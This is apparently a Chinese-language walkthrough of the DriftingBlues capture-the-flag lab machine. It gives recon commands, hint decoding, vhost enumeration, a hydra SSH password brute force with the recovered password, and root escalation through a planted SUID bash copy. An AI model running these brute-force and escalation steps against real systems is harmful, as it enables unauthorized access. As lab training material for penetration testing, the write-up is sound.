一:主机发现
arp-scan -I eth0 10.9.23.0/24

二:端口扫描
nmap -T4 -sV -p- -A 10.9.23.102

三:目录探测
dirb http://10.9.23.102 -X .txt,.php,.html,.bak,.md

四:渗透测试


Charles Brown
sheryl@driftingblues.box
eric@driftingblues.box
L25vdGVmb3JraW5nZmlzaC50eHQ=
base64在线解密
Base64在线加密解密-在线Base64加密解密工具-Base64编码解码工具
/noteforkingfish.txt
得到一个路径
得到了一个 /noteforkingfish.txt 进行访问 发现有很多ok 直接想到了ok解码:
Brainfuck/Text/Ook! obfuscator - deobfuscator. Decode and encode online.

提示使用主机目录
driftingblues.box
先修改host文件

使用Gobuster进行子域名暴力破解
apt-get install gobuster
gobuster vhost -u driftingblues.box -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt | grep "Status: 200"

发现一个新域名,添加到host文件中
test.driftingblues.box

继续使用工具dirb扫一下刚刚得到的域名 :
dirb http://test.driftingblues.box

在robot.txt中得到的目录得到
/ssh_cred.txt

1mw4ckyyucky
提示ssh后面加了一个数字作为密码,所以自己创建一个密码字典进行爆破
hydra -l eric -P 1password.txt -v 10.9.23.102 ssh

得到密码为:
1mw4ckyyucky6
ssh登录
ssh eric@10.9.23.102

在user.txt中发现第一个flag
尝试提权
继续查看一下备份文件backup.sh 发现sudo执行/tmp/emergency文件 但是/tmp 下面没有 需要创建 并将eric用户加入sudo组
echo 'cp /bin/bash /tmp/getroot; chmod +s /tmp/getroot' > /tmp/emergency
chmod +x emergency
./getroot -p
chmod +x emergency
./getroot -p



切换到root得到第二个flag
本文描述了在网络安全环境中,通过ARP扫描、端口扫描(Nmap)、目录探测(Dirb)等技术手段对目标主机进行分析,包括Base64解密、子域名枚举、SSH密码破解以及权限提升的过程,展示了渗透测试的实战步骤。
2303





